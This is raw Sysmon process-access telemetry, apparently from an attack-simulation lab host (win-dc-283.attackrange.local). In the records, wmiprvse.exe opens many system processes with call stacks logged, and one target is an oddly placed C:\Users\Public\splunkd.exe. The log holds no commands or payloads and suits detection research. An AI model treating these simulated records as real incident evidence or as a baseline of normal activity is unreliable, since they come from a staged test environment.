15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022359Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022358Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022357Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022356Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022355Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022354Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022353Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022352Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022351Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022350Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022349Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022348Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022347Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022346Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022345Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022344Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022343Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022342Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022341Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.601{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022340Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 